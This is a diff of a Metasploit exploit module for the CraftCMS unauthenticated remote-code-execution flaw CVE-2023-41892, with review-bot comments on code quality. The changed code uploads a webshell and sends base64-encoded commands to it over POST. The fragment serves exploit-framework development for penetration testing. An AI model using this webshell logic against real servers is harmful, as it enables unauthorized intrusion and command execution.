diff --git a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb index 049ad17f8393..f2e47c6d15ef 100644 --- a/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb +++ b/modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb @@ -35,8 +35,9 @@ def initialize(info = {}) access to the underlying operating system as the user that the web services are running as (typically www-data). }, 'Author' => [ - 'chybeta', # discovery - 'h00die-gr3y ' # Metasploit module + 'h00die-gr3y ', # Metasploit module + 'Thanh', # discovery + 'chybeta' # poc ], 'References' => [ [ 'CVE', '2023-41892' ], @@ -64,7 +65,7 @@ def initialize(info = {}) [ 'Unix Command', { - 'Platform' => 'unix', + 'Platform' => [ 'unix', 'linux' ], 'Arch' => ARCH_CMD, 'Type' => :unix_cmd, 'DefaultOptions' => { @@ -168,11 +169,11 @@ def upload_webshell EOS else # create the MSL payload - # payload = "" + # payload = "" payload = <<~EOS - + EOS @@ -210,28 +211,12 @@ def upload_webshell false end - def execute_php(cmd, _opts = {}) - payload = Base64.strict_encode64(cmd) - return send_request_cgi({ - 'method' => 'POST', - 'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name), - 'ctype' => 'application/x-www-form-urlencoded', - 'vars_post' => { - @post_param => payload - } - }) - end - def execute_command(cmd, _opts = {}) payload = Base64.strict_encode64(cmd) - php_cmd_function = datastore['COMMAND'] return send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name), 'ctype' => 'application/x-www-form-urlencoded', - 'vars_get' => { - @get_param => php_cmd_function - }, 'vars_post' => { @post_param => payload } 
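Review bot: In the `@@ -210,28 +211,12 @@` hunk, the surviving `execute_command` still assigns to a local named `payload`, which shadows the module's `payload` accessor that `exploit` reads as `payload.encoded`. Renaming it keeps the two apart: `encoded_cmd = Base64.strict_encode64(cmd)` and `@post_param => encoded_cmd`. With the `vars_get` block removed, nothing in this hunk reads `datastore['COMMAND']` or `@get_param` any more. If the option registration and the instance-variable assignment still exist elsewhere in the file (not visible here), they are dead code and should be dropped in the same commit. The end of `execute_command` lies outside the hunk.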
@@ -274,9 +259,7 @@ def exploit
 print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
 case target['Type']
- when :php
- execute_php(payload.encoded)
- when :unix_cmd
+ when :php, :unix_cmd
 execute_command(payload.encoded)
 when :linux_dropper
 execute_cmdstager(linemax: 65536)
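Review bot: The merged branch `when :php, :unix_cmd` has no comment explaining why a PHP payload and a shell command can now take the same path through `execute_command`. That is not obvious once `execute_php` and the `COMMAND` query parameter are gone. A one-line comment above the branch would do, e.g. `# php and unix_cmd payloads are both sent base64-encoded in the POST body by execute_command`. The `case` statement continues past the end of the hunk, so whether an unmatched `target['Type']` is handled cannot be judged from here.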